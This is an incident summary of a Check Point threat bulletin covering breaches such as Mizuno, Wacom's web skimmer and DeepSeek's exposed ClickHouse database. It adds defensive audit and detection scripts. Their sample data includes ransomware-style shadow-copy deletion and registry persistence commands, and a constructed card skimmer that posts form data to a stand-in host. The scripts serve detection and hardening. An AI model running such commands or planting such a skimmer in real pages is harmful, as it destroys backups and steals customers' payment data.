Full Report
For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

Mizuno USA, a major sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social […]

Source: "3rd February – Threat Intelligence Report", Check Point Research.
Analysis Summary
This summary covers the incidents that the bulletin excerpt confirms and details, ordered chronologically where the reported compromise dates allow.
# Incident Report: Summary of Recent Cyber Incidents (Late 2024 – Early 2025)
## Executive Summary
Organizations across the manufacturing, technology and healthcare sectors suffered significant cyber incidents between August 2024 and February 2025, driven mainly by ransomware and data theft. Mizuno USA and Community Health Center (CHC) reported the largest confirmed exposure of PII and financial details. Responses ranged from a full network shutdown (New York Blood Center) to the temporary suspension of some IT services (Tata Technologies). The same bulletin highlights three systemic risks: an internet-exposed database with no authentication (DeepSeek), an actively exploited perimeter vulnerability (Fortinet CVE-2024-55591) and evasive commodity malware (Xloader).
## Incident Details
- **Discovery Date:** Varies by incident; the most recent disclosure is the DeepSeek database exposure covered in the 3rd February bulletin.
- **Incident Date:** August 2024 (Mizuno USA) through January 2025 (NY Blood Center, CHC).
- **Affected Organizations:** Mizuno USA, El Cruce Hospital, New York Blood Center Enterprises, Tata Technologies, Wacom, Community Health Center (CHC), Smiths Group, DeepSeek (database exposure).
- **Sector:** Manufacturing (sports equipment, input devices), Healthcare, IT and Engineering Services, AI/Technology (DeepSeek).
- **Geography (by affected organization):** USA (Mizuno USA, NYBCe, CHC), Argentina (El Cruce), India (Tata Technologies), Japan (Wacom), UK (Smiths Group), China (DeepSeek).
## Timeline of Events
**Note:** Specific start times are often not disclosed, so the focus is on the time window of compromise.
### Initial Access
- **August – October 2024 (Mizuno USA)**
  - **Vector:** Not disclosed. The attackers retained access for roughly two months before the intrusion was identified.
  - **Details:** The access was used to exfiltrate PII and financial data.
- **November 28, 2024 – January 8, 2025 (Wacom)**
  - **Vector:** Malicious code injected into the online checkout page (web skimming, Magecart-style).
  - **Details:** Designed to capture customers' payment card data as it was entered.
- **January 2, 2025 (Community Health Center)**
  - **Vector:** Unauthorized access to systems; method not disclosed.
  - **Details:** Exposed PII, SSNs, medical and financial data of more than one million individuals.
- **January 26, 2025 (New York Blood Center Enterprises)**
  - **Vector:** Not disclosed; the incident was identified as a ransomware attack.
  - **Details:** IT systems were affected, leading to an immediate network shutdown and delays in blood donation processing.
- **Undisclosed, recent (El Cruce Hospital)**
  - **Vector:** Not disclosed; ransomware attack claimed by the Medusa group.
  - **Details:** Major impact on IT networks; Medusa publicly threatened to leak 760 GB of patient data.
- **Undisclosed, recent (Tata Technologies)**
  - **Vector:** Not disclosed; ransomware attack.
  - **Details:** Some IT services were temporarily suspended; core client delivery systems were reported unaffected.
### Later Movement & Impact
- **August – October 2024 (Mizuno USA)**
  - **Details:** Attackers remained in the environment for about two months and exfiltrated sensitive PII, including SSNs, financial account data, driver's license and passport numbers.
- **Reported in the 3rd February bulletin (DeepSeek)**
  - **Vector:** Misconfiguration: a ClickHouse database reachable from the internet with no authentication.
  - **Details:** More than a million log entries were exposed, including chat histories and API secrets. Because no credentials were required, anyone who found the instance could query it and potentially take control of the database.
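The DeepSeek exposure is a configuration failure rather than a software vulnerability, so the check is a configuration audit. The script below is an added example (not code from the bulletin or from DeepSeek) that parses a ClickHouse `users.xml` and flags any account that has no credential, uses a plaintext password, or is permitted to connect from any network (`::/0` or `0.0.0.0/0`). The two XML documents are constructed for illustration; the hex digest in them is a placeholder, not a real hash. Where `<networks>` is absent the script reports that the server default must be verified rather than assuming one.

```python
"""Audit a ClickHouse users.xml for accounts reachable without credentials
from any network, the class of misconfiguration behind the DeepSeek
exposure. Added example, not the bulletin's or DeepSeek's code; the XML
documents below are constructed for illustration."""
import xml.etree.ElementTree as ET

# Entries in <networks><ip> that mean "any source address".
ANY_NETWORK = {"::/0", "0.0.0.0/0"}
# Password-style credentials carry their value as element text ...
PASSWORD_TAGS = ("password", "password_sha256_hex", "password_double_sha1_hex")
# ... while external authenticators are configured via child elements.
EXTERNAL_AUTH_TAGS = ("ldap", "kerberos", "ssl_certificates")


def has_credential(user_el):
    """True if the user has any usable credential configured."""
    if user_el.find("no_password") is not None:
        return False
    for tag in PASSWORD_TAGS:
        el = user_el.find(tag)
        if el is not None and (el.text or "").strip():
            return True
    return any(user_el.find(tag) is not None for tag in EXTERNAL_AUTH_TAGS)


def network_restrictions(user_el):
    """Return [(tag, value), ...] from <networks>, or None if it is absent."""
    nets = user_el.find("networks")
    if nets is None:
        return None
    return [(child.tag, (child.text or "").strip()) for child in nets]


def audit_users_xml(xml_text):
    """Return {user_name: [finding, ...]} for every user with at least one finding."""
    root = ET.fromstring(xml_text)  # root is <clickhouse> or the legacy <yandex>
    users = root.find("users")
    findings = {}
    if users is None:
        return findings
    for user_el in users:
        issues = []
        if not has_credential(user_el):
            issues.append("no credential configured")
        pw = user_el.find("password")
        if pw is not None and (pw.text or "").strip():
            issues.append("plaintext <password> in config; prefer password_sha256_hex")
        nets = network_restrictions(user_el)
        if nets is None:
            issues.append("no <networks> restriction declared; verify the server default")
        elif any(tag == "ip" and val in ANY_NETWORK for tag, val in nets):
            issues.append("reachable from any network (::/0 or 0.0.0.0/0)")
            if not has_credential(user_el):
                issues.append("CRITICAL: unauthenticated access from the internet")
        if issues:
            findings[user_el.tag] = issues
    return findings


# Constructed sample: the 'default' user has an empty password and is open to
# the world, 'ops' uses a plaintext password from anywhere, 'logs_reader' is fine.
SAMPLE_USERS_XML = """<clickhouse>
  <users>
    <default>
      <password></password>
      <networks><ip>::/0</ip></networks>
      <profile>default</profile>
    </default>
    <logs_reader>
      <password_sha256_hex>""" + "a3c5" * 16 + """</password_sha256_hex>
      <networks><ip>10.0.0.0/8</ip></networks>
    </logs_reader>
    <ops>
      <password>changeme</password>
      <networks><ip>0.0.0.0/0</ip></networks>
    </ops>
  </users>
</clickhouse>"""

# Constructed hardened version: hashed credential, access only from loopback
# and one internal range, read-only profile.
HARDENED_USERS_XML = """<clickhouse>
  <users>
    <default>
      <password_sha256_hex>""" + "a3c5" * 16 + """</password_sha256_hex>
      <networks><ip>::1</ip><ip>127.0.0.1</ip><ip>10.20.0.0/16</ip></networks>
      <profile>readonly</profile>
    </default>
  </users>
</clickhouse>"""

if __name__ == "__main__":
    for name, issues in audit_users_xml(SAMPLE_USERS_XML).items():
        print(name, "->", "; ".join(issues))
    print("hardened:", audit_users_xml(HARDENED_USERS_XML) or "no findings")
```

Run it against each node's effective `users.xml` (or the files under `users.d/`); a `CRITICAL` line means the instance is one port-scan away from the DeepSeek outcome regardless of what sits in front of it.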
### Detection & Response
- **Detection:** Varies widely. Mizuno's compromise was disclosed only after the August–October 2024 access window had closed; Wacom's skimmer ran for roughly six weeks before removal.
- **Response (NY Blood Center):** Took the network offline immediately; restoration timeline not given.
- **Response (El Cruce):** Remediation under way while facing a ransom demand from the Medusa group.
- **Response (Wacom):** Malicious code removed at the end of the stated compromise window (January 8, 2025); customers whose card data may have been captured were notified.
## Attack Methodology
| Category | Techniques / Observed Tools |
| :--- | :--- |
| **Initial Access** | Internet-exposed, unauthenticated database (DeepSeek); malicious JavaScript injected into the checkout page (Wacom web skimming); authentication bypass on perimeter devices (Fortinet CVE-2024-55591, exploited in the wild); not disclosed for the ransomware victims (NYBCe, El Cruce, Tata Technologies) |
| **Persistence** | Windows registry key modification (Windows Locker, Xloader); copying the payload to a fixed directory (Xloader) |
| **Privilege Escalation** | CVE-2024-55591 grants super-admin privileges on affected FortiOS/FortiProxy devices; use of the ShellExecuteExW API without admin rights (Arcus Media, per the bulletin's malware analysis) |
| **Defense Evasion** | NTDLL hook evasion and runtime code encryption (Xloader) |
| **Credential Access** | Theft of stored browser, e-mail and FTP credentials (Xloader) |
| **Discovery** | Not detailed; the two-month dwell time at Mizuno implies internal reconnaissance |
| **Lateral Movement** | Not detailed for the major breaches; implied by prolonged access |
| **Collection** | Harvesting of PII, SSNs and financial data (Mizuno, CHC); capture of payment card data at checkout (Wacom) |
| **Exfiltration** | Confirmed at Mizuno USA; data exposure at CHC; Medusa claims 760 GB taken from El Cruce |
| **Impact** | File encryption (Windows Locker, Arcus Media, Medusa); service disruption (NY Blood Center, Tata Technologies); extortion via data-leak threats (El Cruce) |
## Impact Assessment
- **Financial:** Ransom demand reported at El Cruce (USD 200K in BTC). Investigation, notification and remediation costs are likely significant for all victims.
- **Data Breach:** Large-scale PII/PHI exposure:
  - **Mizuno USA:** Names, SSNs, financial account information, driver's license and passport numbers.
  - **CHC:** Personal details, SSNs, medical information, financial data (more than one million patients).
  - **Wacom:** Customer payment card data (PCI scope).
  - **El Cruce:** 760 GB of data, including patient information.
- **Operational:** Confirmed disruption at NY Blood Center (delayed donations); temporary suspension of some IT services at Tata Technologies.
- **Reputational:** High, given confirmed large-scale theft of patient and customer data.
## Indicators of Compromise
*(Note: the source publishes no incident-specific IOCs such as hashes, IP addresses or domains; only detection names for the related malware families are available, so the indicators below are generic.)*
- **Network Indicators:** Xloader beaconing to its command-and-control infrastructure (addresses not published).
- **File Indicators:** Check Point detection names for the related families: `Ransomware.Wins.BianLian.*`, `Trojan.Win.Xloader.*`
- **Behavioral Indicators:** Unauthorized access to or modification of systems; registry modification for persistence (Xloader, Windows Locker); deletion of volume shadow copies ahead of encryption (Arcus Media, Windows Locker).
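Because the bulletin offers no atomic indicators, the behavioral ones above are what a SOC can actually hunt on. The script below is an added example (not the bulletin's detection content) that runs two rules over process-creation telemetry: shadow-copy deletion via `vssadmin` or `wmic`, and registry persistence via `reg add` against a `Run`/`RunOnce` key, then correlates the two per host, since persistence followed minutes later by shadow-copy deletion is the typical pre-encryption sequence for the ransomware families named on this page. The event records are constructed and loosely modeled on Sysmon Event ID 1 fields (`Image`, `CommandLine`, `ParentImage`); field names and the 30-minute window are assumptions for the example.

```python
"""Flag the behavioral indicators listed above (shadow-copy deletion,
registry-based persistence) in process-creation events and correlate
them per host. Added example, not from the bulletin; the events below are
constructed and loosely modeled on Sysmon Event ID 1 fields."""
import re
from datetime import datetime, timedelta

# Each rule is applied to the lower-cased command line.
RULES = [
    ("shadow_copy_deletion", re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|"
        r"wmic(\.exe)?\s+shadowcopy\s+delete")),
    ("registry_run_persistence", re.compile(
        r"reg(\.exe)?\s+add\s+.*\\currentversion\\(run|runonce)\b")),
]


def detect(events):
    """Return one alert dict per (rule, event) match, in event order."""
    alerts = []
    for ev in events:
        cmd = ev["cmdline"].lower()
        for name, rx in RULES:
            if rx.search(cmd):
                alerts.append({"rule": name, "host": ev["host"], "ts": ev["ts"],
                               "image": ev["image"], "cmdline": ev["cmdline"]})
    return alerts


def _parse_ts(ts):
    # fromisoformat() rejects a bare 'Z' suffix on Python < 3.11.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def correlate(alerts, window_minutes=30):
    """Hosts where registry persistence is followed by shadow-copy deletion
    within the window: the usual pre-encryption sequence of a ransomware run."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], []).append(a)
    window = timedelta(minutes=window_minutes)
    chained = []
    for host, items in by_host.items():
        persists = [_parse_ts(a["ts"]) for a in items if a["rule"] == "registry_run_persistence"]
        deletes = [_parse_ts(a["ts"]) for a in items if a["rule"] == "shadow_copy_deletion"]
        if any(timedelta(0) <= d - p <= window for p in persists for d in deletes):
            chained.append(host)
    return sorted(chained)


# Constructed telemetry. FS01 shows the full chain; WS07 is a benign
# 'vssadmin list'; WS12 shows persistence without a follow-on deletion.
SAMPLE_EVENTS = [
    {"ts": "2025-01-26T03:10:12Z", "host": "FS01", "user": "CORP\\svc_backup",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
                '/v Updater /t REG_SZ /d "C:\\Users\\Public\\svchost.exe" /f'},
    {"ts": "2025-01-26T03:14:07Z", "host": "FS01", "user": "CORP\\svc_backup",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"ts": "2025-01-26T03:14:09Z", "host": "FS01", "user": "CORP\\svc_backup",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"ts": "2025-01-26T08:02:44Z", "host": "WS07", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"ts": "2025-01-26T09:30:00Z", "host": "WS12", "user": "CORP\\install",
     "parent": "C:\\Windows\\System32\\msiexec.exe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg add "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" '
                "/v Setup /d C:\\ProgramData\\a.exe /f"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for a in hits:
        print(a["ts"], a["host"], a["rule"], "::", a["cmdline"])
    print("ransomware precursor chain on:", correlate(hits))
```

The single-rule alerts are noisy in environments where backup software legitimately prunes shadow copies; the correlated result is the one worth paging on. Extend `RULES` with the registry paths and staging directories from your own Xloader samples once you have them; the bulletin does not publish them.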
## Response Actions
- **Containment:** Immediate network shutdown (NY Blood Center); DeepSeek restricted access to the exposed ClickHouse instance after being notified of the exposure.
- **Eradication:** Not detailed for the ransomware cases; for Xloader, the bulletin's analysis points at the persistence artifacts (registry keys, dropped file copies) that must be removed.
- **Recovery:** NY Blood Center delayed restoration; Tata Technologies focused on keeping core client systems operational during recovery.
## Lessons Learned
- A two-month dwell time (Mizuno) points to insufficient monitoring of the internal environment and weak detection of east-west and egress traffic.
- An internet-reachable database with no authentication (DeepSeek) is an immediate, high-severity exposure: the ClickHouse instance was discoverable and queryable by anyone, without any software vulnerability being involved.
- Detection coverage for the named families (BianLian, Medusa, Xloader) exists in mainstream endpoint and network products (the source cites Check Point's own coverage); known families should not reach execution on a protected host.
## Recommendations
- Implement continuous monitoring of network egress and anomalous data movement so that prolonged attacker presence is detected in days rather than months.
- Immediately audit every internet-reachable database, especially those holding logs, secrets or configuration data, and enforce authentication and source-network restrictions on each one.
- Prioritize patching of perimeter devices for vulnerabilities exploited in the wild, such as the FortiOS/FortiProxy authentication bypass CVE-2024-55591.
- Harden e-commerce checkout pages against web skimming (Wacom incident): inventory and allowlist the scripts that may load on payment pages, enforce that allowlist with a Content-Security-Policy, and alert on any change.
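The last recommendation is the one most teams leave abstract, so here is the concrete check as an added example (not Wacom's code or the bulletin's). It inventories the scripts on a checkout page (external `src` values plus CSP-style SHA-256 hashes of inline scripts), diffs a later snapshot against the approved baseline to catch an injected skimmer, and derives the `script-src` directive that would have blocked it. Both HTML snapshots are constructed; the skimmer-like snippet posts to a `.invalid` domain that can never resolve.

```python
"""Detect unauthorized script changes on a checkout page, the web-skimming
pattern seen in the Wacom incident, and derive a CSP script-src directive
from the approved baseline. Added example, not Wacom's code or the
bulletin's; both HTML snapshots below are constructed."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script URLs and CSP-style hashes of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            # Browsers hash the exact bytes between the tags, so no stripping.
            digest = hashlib.sha256("".join(self._buf).encode("utf-8")).digest()
            self.inline.add("sha256-" + base64.b64encode(digest).decode("ascii"))
            self._buf = None


def script_inventory(html):
    """Return {'external': set of src values, 'inline': set of sha256-... hashes}."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return {"external": p.external, "inline": p.inline}


def diff_inventory(baseline, current):
    """Scripts present in the current page that the approved baseline lacks."""
    return {
        "new_external": sorted(current["external"] - baseline["external"]),
        "new_inline": sorted(current["inline"] - baseline["inline"]),
    }


def csp_script_src(baseline):
    """script-src directive permitting only the baselined origins and inline hashes."""
    origins = {"'self'"}
    for src in baseline["external"]:
        u = urlsplit(src)
        if u.scheme and u.netloc:  # relative URLs are already covered by 'self'
            origins.add(f"{u.scheme}://{u.netloc}")
    hashes = [f"'{h}'" for h in sorted(baseline["inline"])]
    return "script-src " + " ".join(sorted(origins) + hashes)


# Constructed approved checkout page: one same-origin script, one inline snippet.
BASELINE_HTML = """<html><body>
<form id="payment" action="/pay" method="post"><input name="pan"></form>
<script src="/static/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

# Constructed skimmed version: a third-party script and an inline submit
# handler that copies the form to an attacker host (.invalid never resolves).
SKIMMED_HTML = """<html><body>
<form id="payment" action="/pay" method="post"><input name="pan"></form>
<script src="/static/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://static-cdn.invalid/analytics.js"></script>
<script>document.forms.payment.addEventListener("submit", function () {
  navigator.sendBeacon("https://static-cdn.invalid/c", new FormData(document.forms.payment));
});</script>
</body></html>"""

if __name__ == "__main__":
    base = script_inventory(BASELINE_HTML)
    print("Content-Security-Policy:", csp_script_src(base))
    print("unexpected scripts:", diff_inventory(base, script_inventory(SKIMMED_HTML)))
```

Schedule the diff against the live checkout page from outside the CDN and treat any non-empty result as an incident, not a ticket. The derived `script-src` is the enforcement counterpart: with that header in place, the two injected scripts would have been refused by the browser even if the server-side injection succeeded, and the CSP violation reports would have surfaced the compromise on day one rather than after six weeks.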